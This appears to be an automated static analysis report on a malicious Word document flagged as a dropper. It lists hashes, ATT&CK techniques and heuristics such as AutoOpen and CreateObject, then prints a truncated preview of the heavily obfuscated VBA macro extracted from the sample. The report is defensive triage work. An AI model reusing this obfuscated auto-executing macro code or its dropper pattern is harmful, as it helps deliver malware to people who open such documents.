Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 edf206794926e9ce…

MALICIOUS

Office (OLE)

Size: 219.5 KB
Created: 2018-02-24 12:17:31
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: c8547f2d547ce2904634cbba4fe6bc83
SHA-1: 41396700b738dcc38e1250c2a826f3ed36542c74
SHA-256: edf206794926e9ce036c5d32b024e04d890abcb36321186fd6d5cc139ca69727
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1140 Deobfuscate or Obfuscate Malicious Text and Code

The file is a Microsoft Office document containing a VBA macro. The macro runs automatically through the AutoOpen entry point and calls CreateObject, most likely to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6464854-0' further supports classifying it as a dropper. The VBA code is heavily obfuscated, so the exact download URL and execution details cannot be recovered from static analysis alone.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6464854-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6464854-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 70537 bytes
SHA-256: 74b9af94c3a9bd200bc31a5581e027761268b134c3468445bf34c2472efa3102
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 28 long base64-like blob(s).
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UEufDdqbv"
Function PaiFTzwRWjTUw()
On Error Resume Next
cnrvFizoS = "SqSmjutrOHXac!%3rav%!!%8rav%!!%HWEmUowWWHws"
dqiacrda = 4185429 / Atn(HJHHDOF) / (5638159 - YPjbRzEwJ / 2891041 - Sqr(miiKqRM * CStr(klTKJBo / Sgn(3722370 - CDate(7887620 / FhnOrJY * 2635075 * Sqr(DqvVBOGc))))) + (fwQmCuslF - 820513 / 4396564 / CLng(4941431)))
LisSXr = 5600425 / Atn(OkDhbYqUlc) / (27213 - UoPRwD / 4865724 - Sqr(nsvTfsV * CStr(EUqraM / Sgn(6306747 - CDate(7152367 / hfEiKKomtZEVnI * 3809841 * Sqr(NqWoj))))) + (iCjQR - 7288842 / 1681166 / CLng(6464746)))
dTBjoTZATK = zNZBdpCHj + dd333h3sd(cnrvFizoS, 13, 18)
cYJcI = "rtuCvVBMpYXpUGLG"
KlOHCtOSVCk = 8868211 / Atn(nLrjwIMKTLzi) / (9091 - wpOPCCmnFp / 5515616 - Sqr(RvRvCjoBSs * CStr(VXmkIHAfiVp / Sgn(2552144 - CDate(5240778 / BwrAzFBD * 4184749 * Sqr(RtYITqwIFHsrQ))))) + (ijFJwHci - 8161564 / 5504047 / CLng(277182)))
jHONZjUtc = 6559402 / Atn(BSmjSBvTPirMnW) / (6263483 - UZJhZV / 3716623 - Sqr(rEOPj * CStr(wHltz / Sgn(8136479 - CDate(3543263 / aqVwPzNzKk * 9138231 * Sqr(WCrAXfzmoN))))) + (fkMmkauZqptz - 3681673 / 2410670 / CLng(5341876)))
IBmKqnUTRi = HiUOYV + dd333h3sd(cYJcI, 5, 1)
fBWzG = "qDIDTvHzYYbDhLFT pTqvjPPP"
DVYVu = 8550160 / Atn(GaVQI) / (3186624 - VUpXqqzCdCf / 8527805 - Sqr(NldPsVubjqDpkO * CStr(zhZhjt / Sgn(4576563 - CDate(8707739 / TDEfktQbpvrUz * 1174699 * Sqr(nWFpdliFb))))) + (EwczLDpsmwpRO - 8335277 / 7341066 / CLng(5003856)))
PUzrOiu = 5512321 / Atn(pXnzb) / (272760 - KniPGlzcpfznd / 5671326 - Sqr(BbLJiWHODDIhP * CStr(BFVbE / Sgn(253249 - CDate(3124134 / cfKroZ * 2350618 * Sqr(mzWwVLoRSXCY))))) + (MzDhYnacMZ - 5418083 / 5209770 / CLng(8848279)))
vLNzJIT = VmttiT + dd333h3sd(fBWzG, 9, 1)
tEsIiVvAwb = "Npl!%6rav%!!%5rav%!zYfCnNsfFFwSXQBQFjGo"
WSrRqzOXV = 5605141 / Atn(ZuZWGLD) / (1139194 - VjUAmWCwPD / 2782145 - Sqr(dnpKn * CStr(WBwHvAwM / Sgn(7488216 - CDate(3088139 / OBRnlY * 8378715 * Sqr(czwiTYHO))))) + (wGkMTu - 6402016 / 883244 / CLng(5805270)))
vnUqwEc = 2741150 / Atn(UCajmpBBzRrP) / (9576269 - LRXWfjolsPjfw / 9040544 - Sqr(kiHKDw * CStr(ZPsdXFRoE / Sgn(8407106 - CDate(7462135 / IdKiwfAi * 2021924 * Sqr(DHtGuMi))))) + (EutlsIiBMiTD - 2212923 / 7772919 / CLng(8587599)))
ToFZGUIsd = fzrhiCPRJKRipQ + dd333h3sd(tEsIiVvAwb, 21, 16)
EqnYznhBT = "vlQznhEMruzHCoIJvRHBlQSwT"
XZaKt = 2722845 / Atn(cOPAXz) / (9444335 - zYzowCPlTn / 6085085 - Sqr(pBzHiHCuXDob * CStr(wVlsEmiaUBmHYP / Sgn(2789584 - CDate(7516832 / vwkaPaQHRPuC * 594006 * Sqr(jYqCjitOBzMVz))))) + (zKsoHlH - 8421670 / 8233303 / CLng(4646744)))
qjXQPXPNPmP = 6276212 / Atn(VkmWnYRHCjiNiJ) / (8634859 - vnNtaEIHXGu / 3317844 - Sqr(rhSVlIIbiKoE * CStr(JPciGwsawDKmU / Sgn(3109124 - CDate(5309439 / zjiAVKCPrzA * 6911917 * Sqr(RdZpiv))))) + (fsAvYMvdHjQsh - 9240046 / 5887936 / CLng(5727835)))
LnIto = mdaAIiDPPO + dd333h3sd(EqnYznhBT, 22, 2)
RwcVYU = "wFwVjDG=%bOLwjlwjzKjIlbzNCB"
AViWSzHLGv = 1716180 / Atn(ZcBbEAuPWKo) / (3041897 - lVSIaHCzcafBcJ / 2796487 - Sqr(bYfDkYsj * CStr(wiJzsrAtAbUwRo / Sgn(9666983 - CDate(1261475 / wCWZcqjwvlI * 2361411 * Sqr(NciNdZt))))) + (jifIbiuUJkhwAb - 8124434 / 2634874 / CLng(4204218)))
AmsWkkLd = 3998561 / Atn(dzzFrhoOrNDKY) / (2589801 - NTqRAIldlAb / 2942394 - Sqr(lmVrJhQ * CStr(ldnan / Sgn(3898805 - CDate(597164 / FZIjQO * 4416933 * Sqr(EUjrVMEQS))))) + (cEsMBrzjbq - 637377 / 8114152 / CLng(2380422)))
OjrCR = EXwNMn + dd333h3sd(RwcVYU, 10, 14)
rGzWT = "WHEhi!%4rav%!DqsDsHjGHtwNLCYUmzMMMbbtiN"
knvGlqqqSB = 3954607 / Atn(GOAjpIYI) / (4541315 - KYIbmS / 8387268 - Sqr(jlBUrrZEro * CStr(TiiIU / Sgn(481405 - CDate(1210321 / ijEDbqhW * 6683953 * Sqr(wEbjTMjRmXJHk))))) + (jIDbjPoY - 6181046 / 9701350 / CLng(2514310)))
nphrLwCBNGt = 8685913 / Atn(hadJUqOvjZ) / (7067918 - RYCQiKW / 9841936 - Sqr(TSnGpTBXYcVa * CStr(CrINoRVVAjTQ / Sgn(2873935 - CDate(8224967 / IzoqtmNIqDiX
... (truncated)